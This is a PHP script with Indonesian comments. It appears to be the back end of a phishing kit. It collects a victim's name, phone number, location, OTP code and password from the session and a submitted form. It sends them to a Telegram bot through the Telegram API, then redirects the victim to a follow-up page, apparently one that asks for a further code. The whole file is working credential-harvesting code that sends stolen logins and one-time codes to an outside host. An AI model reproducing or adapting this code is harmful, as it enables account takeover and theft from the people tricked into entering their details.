<?php
session_start(); // Mulai sesi

// Termasuk file konfigurasi
require '../config.php'; // Pastikan ini menunjuk ke file yang benar

// Atur zona waktu ke Jakarta
date_default_timezone_set('Asia/Jakarta');

// Ambil data dari session dan form
$position = isset($_SESSION['position']) ? $_SESSION['position'] : '';
$location = isset($_SESSION['location']) ? $_SESSION['location'] : '';
$name = isset($_SESSION['name']) ? $_SESSION['name'] : '';
$phone = isset($_SESSION['phone']) ? $_SESSION['phone'] : '';
$otp = isset($_SESSION['otp']) ? $_SESSION['otp'] : '';
$password = $_POST['password'];

// Simpan data password ke dalam session
$_SESSION['password'] = $password;

// Dapatkan waktu akses saat ini di zona waktu Jakarta
$timestamp = date('Y-m-d H:i:s'); // Format: 2024-08-24 14:35:00

// Format pesan yang akan dikirim ke Telegram dengan simbol kustom
$message = "•┌─────═━┈🔒┈━═─────┐•\n";
$message .= " ║\n";
$message .= " ╠➥ *Posisi:* `{$position}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Lokasi:* `{$location}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Nama:* `{$name}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Nomor HP:* `{$phone}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Kode OTP:* `{$otp}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Password:* `{$password}`\n";
$message .= " ║\n";
$message .= " ╠➥ `{$timestamp}`\n";
$message .= "•└─────═━┈⏰┈━═─────┘•";

// URL API Telegram
$url = "https://api.telegram.org/bot{$apiToken}/sendMessage";

// Data yang akan dikirim ke API Telegram
$data = array(
    'chat_id' => $chatId,
    'text' => $message,
    'parse_mode' => 'MarkdownV2' // Gunakan MarkdownV2 untuk format
);

// Gunakan cURL untuk mengirim data ke Telegram
$options = array(
    'http' => array(
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query($data)
    )
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);

if ($result === FALSE) {
    die('Error sending message');
}

// Redirect ke halaman berikutnya (misalnya, code.html)
header('Location: ../data/code.html');
exit();
?>
